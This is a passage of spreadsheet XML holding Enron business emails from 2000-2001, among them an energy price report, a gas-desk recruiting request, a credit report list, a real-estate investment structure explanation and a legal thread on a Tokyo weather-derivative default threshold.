bouncing between 19.4 and 19.55$/MWh.  Temperatures were expected to reach_x000D_
highs in the low-50s on Thursday across ECAR.  The latest six-to-ten called_x000D_
for above-normal temperatures from January 29 to February 2._x000D_
_x000D_
Day-ahead power prices tanked in the Southeast on Wednesday, weighed down by_x000D_
bearish fundamentals.  Into Entergy deals were done between 17.1 and_x000D_
18$/MWh, with the bulk of transactions heard near 17.75$/MWh.  February saw_x000D_
action from 18.3 to 18.4$/MWh.  High temperatures across SERC were expected_x000D_
in the spring-like upper-60s to low-70s on Thursday.  Texas power prices_x000D_
bucked the trend on Wednesday, rising on cooler weather for Thursday.  The_x000D_
most current six-to-ten called for above-normal temperatures in the_x000D_
Southeast from January 29 to February 2._x000D_
____________________________________________________________x000D_
_x000D_
California ISO Congestion Index in $/MWh_x000D_
_x000D_
                         Path                 Peak   Off-peak_x000D_
for 24-Jan-02         NW1 to NP15             0.00     0.00_x000D_
                      NW3 to SP15             0.00     0.00_x000D_
                      AZ3 to SP15             0.00     0.00_x000D_
                      LC1 to SP15             0.00     0.00_x000D_
                      SP15 to NP15            0.00     0.00_x000D_
_x000D_
_x000D_
_x000D_
OTC Forward Peak Electricity Contracts in $/MWh_x000D_
_x000D_
                    Mid-C              PV              SP-15_x000D_
                Bid      Ask      Bid      Ask      Bid      Ask_x000D_
BOM             NA       NA       NA       NA       NA       NA_x000D_
February        NA       NA       NA       NA       NA       NA_x000D_
March           NA       NA       NA       NA       NA       NA_x000D_
April           NA       NA       NA       NA       NA       NA_x000D_
Q2 '02          NA       NA       NA       NA       NA       NA_x000D_
Q3 '02          NA       NA       NA       NA       NA       NA_x000D_
Q4 '02          NA       NA       NA       NA       NA       NA_x000D_
Q1 '03          NA       NA       NA       NA       NA       NA_x000D_
Cal '03         NA       NA       NA       NA       NA       NA_x000D_
_x000D_
Represents the most recent bid/ask spread obtainable_x000D_
by the Energy Market Report._x000D_
_x000D_
_x000D_
_x000D_
Alberta Power Pool Index (C$/MWh)_x000D_
_x000D_
                    Peak(14)   Peak(16)   Off-Peak    Flat     Change_x000D_
for  22-Jan-02       39.46      39.24      19.60      33.29      6.90_x000D_
_x000D_
_x000D_
_x000D_
BPA's Offer for 01/25/02 and 01/26/02._x000D_
_x000D_
Hours        Amount          NW delivered        COB/NOB delivered_x000D_
7-22         200MW           Market Price*          Market Price*_x000D_
_x000D_
*Market price will be determined at time of request._x000D_
_x000D_
_x000D_
_x000D_
NYMEX Henry Hub Gas Futures in $/mmBtu_x000D_
_x000D_
                 Close        Change_x000D_
        Feb      2.076        -0.030_x000D_
        Mar      2.089        -0.029_x000D_
_x000D_
_x000D_
_x000D_
Natural Gas Spot Prices in $/mmBtu_x000D_
_x000D_
                  Low          High_x000D_
Sumas             2.01         2.06_x000D_
So. Cal Border    2.12         2.17_x000D_
San Juan          1.96         2.01_x000D_
___________________________________________________________x000D_
_x000D_
Economic Insight, Inc. - 3004 SW First, Portland, Oregon 97201,_x000D_
Telephone (503) 222-2425, Internet e-mail emr@econ.com -_x000D_
Copyright, Economic Insight, Inc. 2002.</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 12:34:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'premierpumpcompany@home.com'})</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
From the desk of_x000D_
Bill Scholtes_x000D_
Premier Pump Company</t>
  </si>
  <si>
    <t>Thu, 13 Sep 2001 07:22:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: EES gas desk</t>
  </si>
  <si>
    <t xml:space="preserve">Please let Don or myself know if you are aware of any qualified candidates to assist EES in their rebuilding._x000D_
_x000D_
Mike_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Black, Don  _x000D_
Sent:	Wednesday, September 12, 2001 1:01 PM_x000D_
To:	Shively, Hunter S.; Grigsby, Mike; Neal, Scott; Martin, Thomas A._x000D_
Cc:	Lavorato, John_x000D_
Subject:	EES gas desk_x000D_
_x000D_
I am in desperate need of some experienced gas people to keep EES out of trouble in the various niche wholesale and retail markets where we operate._x000D_
_x000D_
I am soliciting resumes and interviewing people from around the industry.  If you know of anyone we should go after (internal or external) to help us price and manage our positions please let me know their name.  We are recruiting a different desk specialization than what you are currently seeking.  We _x000D_
_x000D_
I am attaching the resume of a person we are interested in.  Please review this guy's background and let me know if you have any opinion on him, know him personally, or know something about him that may impact whether we want to hire him._x000D_
_x000D_
Thanks in advance for your help._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 7 May 2001 05:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hey.  I went on a company outing to Aransas Pass last week.  Left Wed _x000D_
afternoon and got back Friday afternoon.  One of the pipelines I deal with _x000D_
has a hunting and fishing lodge down there.  It was nice.  I caught 2 redfish _x000D_
- both keepers too!  The guide would bait my hook and throw it in the water.  _x000D_
All I had to do was sit there and look pretty till the fish started biting.  _x000D_
I could really get used to that sort of thing._x000D_
_x000D_
The fishing guide said I should expect to pay about $1,000/ft for my fishing _x000D_
boat.  I guess my boat will only be about 4 ft long.   Keep looking for my _x000D_
BOAT._x000D_
_x000D_
Let's see - the ex wife came in from Denver for a wedding Friday night.  She _x000D_
stayed with me all weekend.  I took her to the airport this morining.  Things _x000D_
went pretty well - no romance, just good friends.  I introduced her to my _x000D_
girlfriend - we all had lunch together.  That was a little odd._x000D_
_x000D_
Nothing else going on.  I'll try to have an update on the legal stuff by Wed._x000D_
_x000D_
Later Gator.</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 11:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Meeting on Tuesday, December 12 at 2 p.m.</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff, I have an Enron Board of Directors Meeting that may extend until _x000D_
approximately 1:30 p.m., and I have another meeting that begins at 3 p.m.  We _x000D_
could meet in my office from 2 to 3 on that date.  If an hour is not _x000D_
sufficient, we would need to select another date.  All the best.  Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff A Sokoloff &lt;jeffsok@juno.com&gt; on 12/07/2000 11:29:19 AM_x000D_
To: James_Derrick@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Meeting on Tuesday, December 12 at 2 p.m._x000D_
_x000D_
_x000D_
Jim,_x000D_
_x000D_
Carrin asked me to see if you would be available to meet on Tuesday,_x000D_
December 12 at 2 p.m.   We would meet downtown to begin discussing plans_x000D_
for the Karen H. Susman Jurisprudence Award Luncheon, now confirmed for_x000D_
Monday, April 23, 2001._x000D_
_x000D_
Jeff Sokoloff_x000D_
_________________________________________________________________x000D_
GET INTERNET ACCESS FROM JUNO!_x000D_
Juno offers FREE or PREMIUM Internet access for less!_x000D_
Join Juno today!  For your FREE software, visit:_x000D_
http://dl.www.juno.com/get/tagj._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 01:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Credit Report 3/12/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 03/12/2001 _x000D_
09:09 AM ---------------------------_x000D_
From: Russell Diamond/ENRON@enronXgate on 03/12/2001 09:03 AM_x000D_
To: Janie Aguayo/HOU/ECT@ECT, Diane Anderson/NA/Enron@Enron, Derek _x000D_
Bailey/Corp/Enron@ENRON, David Baumbach/HOU/ECT@ECT, Jean Bell/HOU/ECT@ECT, _x000D_
Patricia Boulanger/CAL/ECT@ECT, Bob Bowen/HOU/ECT@ECT, Debbie R _x000D_
Brackett/HOU/ECT@ECT, William S Bradford/ENRON@enronXgate, Lesli _x000D_
Campbell/ENRON@enronXgate, Celeste Cisneros/NA/Enron@Enron, Sharon _x000D_
Crawford/CAL/ECT@ECT, Richard Deming/NA/Enron@Enron, Russell _x000D_
Diamond/ENRON@enronXgate, Cindy Feldman/CAL/ECT@ECT, Darron C _x000D_
Giron/HOU/ECT@ECT, Veronica Gonzalez/ENRON@enronXgate, Jeffrey C _x000D_
Gossett/HOU/ECT@ECT, Walter Guidroz/ENRON@enronXgate, Larry Joe _x000D_
Hunter/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON, Nidia Mendoza/ENRON@enronXgate, Kevin _x000D_
Meredith/Corp/Enron@ENRON, Tom Moran/ENRON@enronXgate, Leslie _x000D_
Reeves/HOU/ECT@ECT, Tanya Rohauer/ENRON@enronXgate, Dianne Seib/CAL/ECT@ECT, _x000D_
Linda Sietzema/CAL/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Ellen _x000D_
Wallumrod/NA/Enron@ENRON, Melinda Whalen/CAL/ECT@ECT, Tiffany _x000D_
Williams/NA/Enron@Enron, Veronica Espinoza/ENRON@enronXgate_x000D_
cc:  _x000D_
Subject: Credit Report 3/12/01_x000D_
_x000D_
_x000D_
_x000D_
Counterparty     TAGG#  _x000D_
Action                                                            _x000D_
CMS Energy Corporation   qW3331.1 Rebook to CMS Marketing, Services and _x000D_
Trading_x000D_
Consolidated Edison Company of New York qW2007.1 Pending Jay Williams_x000D_
Dynegy Energy Inc.    qW2360.1 Rebook to Dynegy Marketing &amp; Trade_x000D_
Engage Energy Canada LP   qW3304.1 Rebook from ENA to ECC (Under the ISDA)_x000D_
 "     qW3303.1   "_x000D_
FAMM Fuel and Marine Marketing   qW3046.3 Pending Brant Reves_x000D_
Hunt Petroleum Corp    qW2337.1 Pending Russell Diamond_x000D_
Jay Paper Sales, Inc.    qW3406.1 Pending Arpana Rajaram_x000D_
Louis Dreyfus Natural Gas Holdings  qW3036.1 Rebook to Louis Dreyfus Natural _x000D_
Gas Corp_x000D_
New Counterparty    qW1880.1 Pending Russell Diamond_x000D_
Phibro (Asia) Pte Ltd.    qW3046.2 Rebook to Phibro Inc._x000D_
Seminole Transportation and Gathering  qW1864.6 Pending Jay Williams_x000D_
Tubos de Acero de Mexico SA   qW0941.1 Pending Paul Radous_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 04:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Every Vote Counts!</t>
  </si>
  <si>
    <t>Houston voters are facing a very exciting election this year. You will help=_x000D_
=20_x000D_
decide who represents you in federal, state and county offices.  You will=_x000D_
=20_x000D_
also help decide the outcome of important referenda, including whether to=_x000D_
=20_x000D_
approve a new downtown arena._x000D_
_x000D_
Elections will be held Tuesday, November 7, 2000 from 7:00 a.m. to 7:00 p.m=_x000D_
. =20_x000D_
Precinct information is listed on your voter registration card.  If you don=_x000D_
=01,t=20_x000D_
have your card, you can turn to the Election Day edition of the Houston=20_x000D_
Chronicle which will list Harris County precinct locations.  Precinct=20_x000D_
information for other counties can be found by calling the numbers listed=_x000D_
=20_x000D_
below._x000D_
_x000D_
 Brazoria        979-864-1359_x000D_
 Chambers     409-267-8309_x000D_
 Ft. Bend        281-341-8670_x000D_
 Galveston      409-766-2210=20_x000D_
 Liberty  936-336-4670         =20_x000D_
 Montgomery  936-536-7885_x000D_
 Waller            979-826-7711_x000D_
 For further information, call=20_x000D_
   1-800-252-VOTE_x000D_
_x000D_
Presidential, State and Federal legislative candidate information can be=20_x000D_
found on-line through the following link:  http://congress.nw.dc.us/enron/_x000D_
Additionally, Voters Guides for Harris County published by the League of=20_x000D_
Women Voters are available at EB4706c._x000D_
_x000D_
Remember: =20_x000D_
EVERY VOTE COUNTS!</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 06:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'daren.farmer@enron.com', 'julie.meyers@enron.com', 'michael.walters@enron.com', 'pat.clynes@enron.com'})</t>
  </si>
  <si>
    <t>Spot Deals</t>
  </si>
  <si>
    <t>I have created and entered the following deals in Sitara as HPLC - IM _x000D_
Wellhead purchases for November, 2000 production:_x000D_
_x000D_
Deal #  Counterparty  Meter #  Volume_x000D_
_x000D_
452582 Cokinos Nat Gas 9840   890  Killed_x000D_
452574 Crosstex Energy 9858   1,000_x000D_
452579 Cummins &amp; Walker 9857   537  Killed_x000D_
452590 Duke Energy Trad 6347   139_x000D_
452595 Coastal Merchant 5848   183_x000D_
452597 Coastal Merchant 5923   562_x000D_
452600 Heatherloch Mun 6879   359_x000D_
452601 Pringle Resources 9849   300_x000D_
453067 Shoreline Gas 9860   700_x000D_
452566 Suemaur Explor 9856   2,700_x000D_
453305 Swift Energy  2630   322_x000D_
453483 Tri-Union Devel 2697   1,016_x000D_
453525 Vintage Gas, Inc 9603   1_x000D_
453572 Whiting Petroleum 6523   106_x000D_
_x000D_
Bob</t>
  </si>
  <si>
    <t>Mon, 3 Dec 2001 08:44:07 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Read each sentence slowly and think about it._x000D_
_x000D_
Love starts with a smile, grows with a kiss, and ends_x000D_
with a tear._x000D_
_x000D_
Don't cry over anyone who won't cry over you._x000D_
_x000D_
Good friends are hard to find, harder to leave, and_x000D_
impossible to forget._x000D_
_x000D_
You can only go as far as you push._x000D_
_x000D_
Actions speak louder than words._x000D_
_x000D_
The hardest thing to do is watch the one you love,_x000D_
love somebody else._x000D_
_x000D_
Don't let the past hold you back, you're missing the_x000D_
good stuff._x000D_
_x000D_
Life's short. If you don't look around once in a while_x000D_
you might miss it._x000D_
_x000D_
A BEST FRIEND is like a four leaf clover, HARD TO FIND_x000D_
and LUCKY TO HAVE._x000D_
_x000D_
Some people make the world SPECIAL just by being in_x000D_
it._x000D_
_x000D_
BEST FRIENDS are the siblings God forgot to give us._x000D_
_x000D_
When it hurts to look back, and you're scared to look_x000D_
ahead, you can look beside you and your BEST FRIEND_x000D_
will_x000D_
be there._x000D_
_x000D_
TRUE FRIENDSHIP "NEVER" ENDS. Friends are FOREVER._x000D_
_x000D_
Good friends are like stars....You don't always see_x000D_
them, but you know they are always there._x000D_
_x000D_
Don't frown. You never know who is falling in love_x000D_
with_x000D_
your smile._x000D_
_x000D_
What do you do when the only person who can make you_x000D_
stop crying is the person who made you cry?_x000D_
_x000D_
Nobody is perfect until you fall in love with them._x000D_
_x000D_
Everything is okay in the end. If it's not okay, then_x000D_
it's not the end._x000D_
_x000D_
Most people walk in and out of your life, but only_x000D_
friends leave footprints in your heart._x000D_
_x000D_
Send this on to everyone special in your life, even_x000D_
the_x000D_
people who really make you mad sometimes and to the_x000D_
people whose lives you want to be in!!!_x000D_
_x000D_
And send it back to the person who sent it too you_x000D_
if they mean something to you !!_x000D_
_x000D_
Remember, every minute spent angry is sixty seconds of_x000D_
happiness wasted._x000D_
_x000D_
_x000D_
AWESOME PRAYER:_x000D_
May today there be peace within you. May you trust_x000D_
God_x000D_
that you are exactly where you are meant to be. "I_x000D_
believe that friends are quiet angels who lift us to_x000D_
our_x000D_
feet when our wings have trouble remembering how to_x000D_
fly."_x000D_
_x000D_
Just send this to (4) people and see what happens on_x000D_
the_x000D_
fourth day. Do not break this, please. There is no_x000D_
cost,_x000D_
but lots of rewards._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Jul 2000 06:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grant.oh@enron.com', 'george.mcclellan@enron.com', 'brian.redmond@enron.com', 'ross.prevatt@enron.com', 'janet.dietrich@enron.com', 'homer.lin@enron.com', 'marc.sabine@enron.com', 'jeff.donahue@enron.com', 'kate.chaney@enron.com', 'eric.bass@enron.com', 'elizabeth.mccarthy@enron.com', 'chris.dorland@enron.com', 'eva.rainer@enron.com', 'susan.lewis@enron.com', 'david.oxley@enron.com', 'jennifer.reside@enron.com', 'purvi.patel@enron.com', 'john.scarborough@enron.com', 'carrie.southard@enron.com', 'jurgen.hess@enron.com', 'raymond.bowen@enron.com', 'jennifer.martinez@enron.com', 'john.king@enron.com', 'rodney.malcolm@enron.com', 'mo.bawa@enron.com', 'gabriel.monroy@enron.com', 'reza.rezaeian@enron.com', 'kyle.etter@enron.com', 'matthew.jachimiak@enron.com', 'sean.keenan@enron.com', 'raimund.grube@enron.com', 'erin.willis@enron.com', 'nick.hiemstra@enron.com', 'john.lavorato@enron.com', 'gaurav.babbar@enron.com', 'eric.scott@enron.com', 'brandon.wax@enron.com', 'nicole.la@enron.com', 'jason.seigal@enron.com', 'catherine.clark@enron.com', 'ted.bland@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Dinner with ENA Associates &amp; Analysts</t>
  </si>
  <si>
    <t>Please plan to attend a  reception and dinner for those Analysts and _x000D_
Associates due to rotate in the near future who have made significant _x000D_
contributions to  Enron North America.  The function will be hosted  by the _x000D_
Office of the Chairman at Morton's Steak House located at 5000 Westheimer on _x000D_
July 27, 2000.  The reception will start at 7:00pm with dinner to follow at _x000D_
7:45pm.  Please RSVP to Ted Bland at ext. 3-5275 no later than close of _x000D_
business Monday, July 24.  This will be an informal gathering to discuss the _x000D_
progress of ENA and an open forum to interact with the management team on a _x000D_
one on one basis.  See you on Thursday. _x000D_
_x000D_
 Mark, Dave and John</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 10:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mary.hain@enron.com', 'mona.petrochko@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'paul.kaufman@enron.com', 'skean@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>#s for folks on your panel</t>
  </si>
  <si>
    <t>Your panel:_x000D_
_x000D_
Bill Reed: 619.696.4542_x000D_
Mike Florio 415.929.8876_x000D_
Terry Winter: 916.351.2222_x000D_
Jim Macias: 925.600.2306._x000D_
_x000D_
Between us, we know them all well.  Be happy to help contact._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 09:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Investment Structure</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 09/26/2000 _x000D_
04:26 PM ---------------------------_x000D_
_x000D_
_x000D_
"George Richards" &lt;cbpres@austin.rr.com&gt; on 09/26/2000 01:18:45 PM_x000D_
Please respond to &lt;cbpres@austin.rr.com&gt;_x000D_
To: "Phillip Allen" &lt;pallen@enron.com&gt;_x000D_
cc: "Larry Lewter" &lt;retwell@mail.sanmarcos.net&gt;, "Claudia L. Crocker" _x000D_
&lt;clclegal2@aol.com&gt; _x000D_
Subject: Investment Structure_x000D_
_x000D_
_x000D_
STRUCTURE:_x000D_
Typically the structure is a limited partnership with a corporate (or LLC)_x000D_
general partner.  The General Partner owns 1% of the project and carries the_x000D_
liability of construction._x000D_
_x000D_
LAND OWNERSHIP &amp; LOANS_x000D_
The property would be purchased in the name of the limited partnership and_x000D_
any land loans, land improvements loans and construction loans would be in_x000D_
the name of the limited partnership.  Each of the individual investors and_x000D_
all of the principals in Creekside would also personally guarantee the_x000D_
loans.  If the investor(s) do not sign on the loans, this generally means_x000D_
that a larger amount of cash is required and the investor's share of profits_x000D_
is reduced._x000D_
_x000D_
All loans for residential construction, that are intended for re-sale, are_x000D_
full recourse loans.  If we are pursuing multifamily rental developments,_x000D_
the construction loans are still full recourse but the mortgage can often be_x000D_
non-recourse._x000D_
_x000D_
USE OF INITIAL INVESTMENT_x000D_
The initial investment is used for land deposit, engineering &amp;_x000D_
architectural design, soils tests, surveys, filing fees, legal fees for_x000D_
organization and condominium association formation,  and appraisals.  Unlike_x000D_
many real estate investment programs, none of the funds are used for fees to_x000D_
Creekside Builders, LLC.  These professional expenses will be incurred over_x000D_
the estimated 6 month design and approval period._x000D_
_x000D_
EARLY LAND COSTS_x000D_
The $4,000 per month costs listed in the cash flow as part of land cost_x000D_
represent the extension fees due to the seller for up to 4 months of_x000D_
extensions on closing.  As an alternative, we can close into a land loan at_x000D_
probably 70% of appraised value.  With a land value equal to the purchase_x000D_
price of $680,000 this would mean a land loan of $476,000 with estimated_x000D_
monthly interest payments of $3,966, given a 10% annual interest rate, plus_x000D_
approximately 1.25% of the loan amount for closing costs and loan fees._x000D_
_x000D_
EQUITY AT IMPROVEMENT LOAN_x000D_
Once the site plan is approved by the City of Austin, the City will require_x000D_
the development entity to post funds for fiscal improvements, referred to as_x000D_
the "fiscals".  This cost represents a bond for the completion of_x000D_
improvements that COA considers vital and these funds are released once the_x000D_
improvements have been completed and accepted by COA.  This release will be_x000D_
for 90% of the cost with the remaining 10% released one year after_x000D_
completion.  Releases can be granted once every 90 days and you should_x000D_
expect that the release would occur 6 months after the start of lot_x000D_
improvement construction.  These fiscals are usually posted in cash or an_x000D_
irrevocable letter of credit.  As such, they have to be counted as a_x000D_
development cost, even though they are not spent.  Because they are not_x000D_
spent no interest is charged on these funds._x000D_
_x000D_
The lot improvement loan is typically 75% of the appraised value of a_x000D_
finished lot, which I suspect will be at least $20,000 and potentially as_x000D_
high as $25,000.  This would produce a loan amount of  $15,000 on $20,000_x000D_
per lot.  With estimated per lot improvement costs of $9,000, 'fiscals' at_x000D_
$2,000 and the land cost at $8,000 , total improved lot cost is $19,000_x000D_
which means $0 to $4,000 per lot in total equity.  The investment prior to_x000D_
obtaining the improvement loan would count towards any equity requirement_x000D_
provided it was for direct costs.  Thus, the additional equity for the_x000D_
improvement loan would be $0-$184,000.   Even if the maximum loan would_x000D_
cover all costs, it is unlikely the bank would allow reimbursement of funds_x000D_
spent. The higher estimates of equity investments are shown in the_x000D_
preliminary proforma to be on the safe side.  The engineer is preparing a_x000D_
tentative site layout with an initial evaluation of the phasing, which can_x000D_
significantly reduce the cash equity requirement._x000D_
_x000D_
Phasing works as follows.  If the first phase was say 40 units, the total_x000D_
lot improvement cost might average $31,000 per lot.   Of this, probably_x000D_
$13,000 would be for improvements and $19,000 for the land cost.  The_x000D_
improvements are higher to cover large one time up front costs for design_x000D_
costs, the entry road, water treatment costs, perimeter fencing and_x000D_
landscaping, and so on, as well as for 100% of the land.  The land loan for_x000D_
undeveloped lots would be 70% of the appraised raw lot value, which I would_x000D_
estimate as $10,000 per lot for a loan value of $7,000 per lot.  Then the_x000D_
loan value for each improved lot would be $15,000 per lot.  This would give_x000D_
you a total loan of $992,000, total cost of $1,232,645 for equity required_x000D_
of $241,000.  This was not presented in the initial analysis as the phasing_x000D_
is depended on a more careful assessment by the Civil Engineer as the_x000D_
separate phases must each be able to stand on its own from a utility_x000D_
standpoint._x000D_
_x000D_
CONSTRUCTION LOANS_x000D_
There are three types of  construction loans.  First, is a speculative_x000D_
(spec) loan that is taken out prior to any pre-sales activity.  Second,  is_x000D_
a construction loan for a pre-sold unit, but the loan remains in the_x000D_
builder/developers name.  Third, is a pre-sold unit with the construction_x000D_
loan in the name of the buyer.  We expect to have up to 8 spec loans to_x000D_
start the project and expect all other loans to be pre-sold units with loans_x000D_
in the name of the builder/developer.  We do not expect to have any_x000D_
construction loans in the name of the buyers, as such loans are too_x000D_
difficult to manage and please new buyers unfamiliar with the process._x000D_
_x000D_
Spec loans will be for 70% to 75% of value and construction loans for_x000D_
pre-sold units, if the construction loan is from the mortgage lender,  will_x000D_
be from 80% to 95% of value._x000D_
_x000D_
DISBURSEMENTS_x000D_
Disbursements will be handled by the General Partner to cover current and_x000D_
near term third party costs, then to necessary reserves, then to priority_x000D_
payments and then to the partners per the agreement.  The General Partner_x000D_
will contract with Creekside Builders, LLC to construct the units and the_x000D_
fee to CB will include a construction management and overhead fee equal to_x000D_
15% of the direct hard cost excluding land, financing and sales costs._x000D_
These fees are the only monies to Creekside, Larry Lewter or myself prior to_x000D_
calculation of profit, except for a) direct reimbursement for partnership_x000D_
expenses and b) direct payment to CB for any subcontractor costs that it has_x000D_
to perform.  For example, if CB cannot find a good trim carpenter sub, or_x000D_
cannot find enough trim carpenters, etc., and it decides to undertake this_x000D_
function, it will charge the partnership the same fee it was able to obtain_x000D_
from third parties and will disclose those cases to the partnership._x000D_
Finally, CB will receive a fee for the use of any of its equipment if it is_x000D_
used in lieu of leasing equipment from others.  At present CB does not own_x000D_
any significant equipment, but it is considering the purchase of a sky track_x000D_
to facilitate and speed up framing, cornice, roofing and drywall spreading._x000D_
_x000D_
REPORTING_x000D_
We are more than willing to provide reports to track expenses vs. plan._x000D_
What did you have in mind?  I would like to use some form of internet based_x000D_
reporting._x000D_
_x000D_
BOOKKEEPING_x000D_
I am not sure what you are referring to by the question, "Bookkeeping_x000D_
procedures to record actual expenses?"  Please expand._x000D_
_x000D_
INVESTOR INPUT_x000D_
We are glad to have the investor's input on design and materials.  As always_x000D_
the question will be who has final say if there is disagreement, but in my_x000D_
experience I have always been able to reach consensus. As you, and I presume_x000D_
Keith, want to be involved to learn as much as possible we would make every_x000D_
effort to be accommodating._x000D_
_x000D_
CREEKSIDE PROCEEDURES_x000D_
CB procedures for dealing with subs, vendors and professionals is not as_x000D_
formal as your question indicates.  In the EXTREMELY tight labor market_x000D_
obtaining 3 bids for each labor trade is not feasible.  For the professional_x000D_
subs we use those with whom we have developed a previous rapport.  Finally,_x000D_
for vendors they are constantly shopped._x000D_
_x000D_
PRE-SELECTED PROFESSIONALS, SUBS AND VENDORS_x000D_
Yes there are many different subs that have been identified and I can_x000D_
provide these if you are interested._x000D_
_x000D_
I know I have not answered everything, but this is a starting point.  Call_x000D_
when you have reviewed and we can discuss further._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
George Richards_x000D_
President, Creekside Builders, LLC_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - winmail.dat_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 03:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Tokyo-Weather Derivative-Warranties Agreed-Question on events_x000D_
 of default</t>
  </si>
  <si>
    <t xml:space="preserve">OK thanks.  Other side will be happy with this._x000D_
Wasn't sure what would be material for us .._x000D_
Jane_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Alan Aronowitz@ECT_x000D_
	10/25/2000 02:21 AM_x000D_
		_x000D_
		 To: Jane McBride/AP/Enron@ENRON_x000D_
		 cc: John Viverito/Corp/Enron@Enron, Mark Evans/Legal/LON/ECT@ECT, Mark _x000D_
Taylor/HOU/ECT@ECT_x000D_
		 Subject: Re: Tokyo-Weather Derivative-Warranties Agreed-Question on events _x000D_
of default _x000D_
_x000D_
Jane:_x000D_
_x000D_
There is no specific policy on this E of D to my knowledge because it was _x000D_
specially added for Japan to produce an early credit-related event of _x000D_
default.  Because the monetary figure could cut against Enron Japan, I would _x000D_
suggest that we go with a figure that is material enough as applied against _x000D_
our counterparty, but which if applied to EJ would not easily trigger a _x000D_
default against EJ, let's say USD 1 million or a higher figure._x000D_
_x000D_
Alan_x000D_
_x000D_
_x000D_
_x000D_
	Jane McBride@ENRON_x000D_
	10/24/2000 05:54 AM_x000D_
		 _x000D_
		 To: Mark Evans/Legal/LON/ECT@ECT, Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: Alan Aronowitz/HOU/ECT@ECT, John Viverito/Corp/Enron@Enron_x000D_
		 Subject: Tokyo-Weather Derivative-Warranties Agreed-Question on events of _x000D_
default _x000D_
_x000D_
Dear Mark Evans,_x000D_
_x000D_
Pls let me know (as per email earlier) if you have any further queries - _x000D_
otherwise we will sign this tomorrow.  Thanks for your help._x000D_
  _x000D_
***********_x000D_
_x000D_
Dear Mark Taylor (and Alan or Mark),_x000D_
_x000D_
You will see that we need to include a figure in clause 6(a)(1): Additional _x000D_
Events of Default - Other Financial Crises.  They proposed JPY1,000,000,000 _x000D_
(US$10 million), I counterproposed JPY1,000,000 (US$10,000).  They are now _x000D_
suggesting JPY100,000,000 (US$1,000,000).  _x000D_
_x000D_
I am thinking of suggesting US$500,000 (JPY50,000,000).  Are there any Enron _x000D_
policies etc in this regard? What is the typical range of acceptability for _x000D_
Enron on this? Any other comments? _x000D_
_x000D_
***********_x000D_
_x000D_
Thanks all._x000D_
_x000D_
Jane    _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----- Forwarded by Jane McBride/AP/Enron on 10/24/2000 07:43 PM -----_x000D_
_x000D_
	"Izumi Sato" &lt;isato@mywm.co.jp&gt;_x000D_
	10/24/2000 07:28 PM_x000D_
		 _x000D_
		 To: &lt;Jane.McBride@enron.com&gt;_x000D_
		 cc: &lt;Morten.E.Pettersen@enron.com&gt;, &lt;Ono_T@toare.co.jp&gt;, &lt;wani@mywm.co.jp&gt;_x000D_
		 Subject: RE: ToaRe documentation_x000D_
_x000D_
Dear Ms. McBride,_x000D_
_x000D_
Thank you for your e-mail._x000D_
It is our opinion that the amended clause 5 (c) is acceptable for our_x000D_
client, ToaRe. We are also informed by Mr. Ono that they will accept such_x000D_
clause._x000D_
_x000D_
As to the other issue, JPY1,000,000 is all too low. JPY1,000,000 equals to_x000D_
only about 10,000 US$. If JPY1,000,000,000 is not acceptable for you, how_x000D_
about JPY100,000,000?_x000D_
_x000D_
Akihiro Wani / Izumi Sato_x000D_
Mitsui Yasuda Wani &amp; Maeda_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jane.McBride@enron.com [mailto:Jane.McBride@enron.com]_x000D_
Sent: Tuesday, October 24, 2000 2:54 PM_x000D_
To: Izumi Sato; wani@mywm.co.jp_x000D_
Cc: Morten.E.Pettersen@enron.com; Ono_T@toare.co.jp_x000D_
Subject: RE: ToaRe documentation_x000D_
_x000D_
_x000D_
_x000D_
Dear Ms. Sato and Mr Wani,_x000D_
_x000D_
(See attached file: Weather-HDD-Floor-OTC-ToaRejmb2000-10-24r.doc)_x000D_
_x000D_
Thank you for your email and it is my turn to apologize for our delay in_x000D_
reverting to you.  I have had to involve numerous people throughout our_x000D_
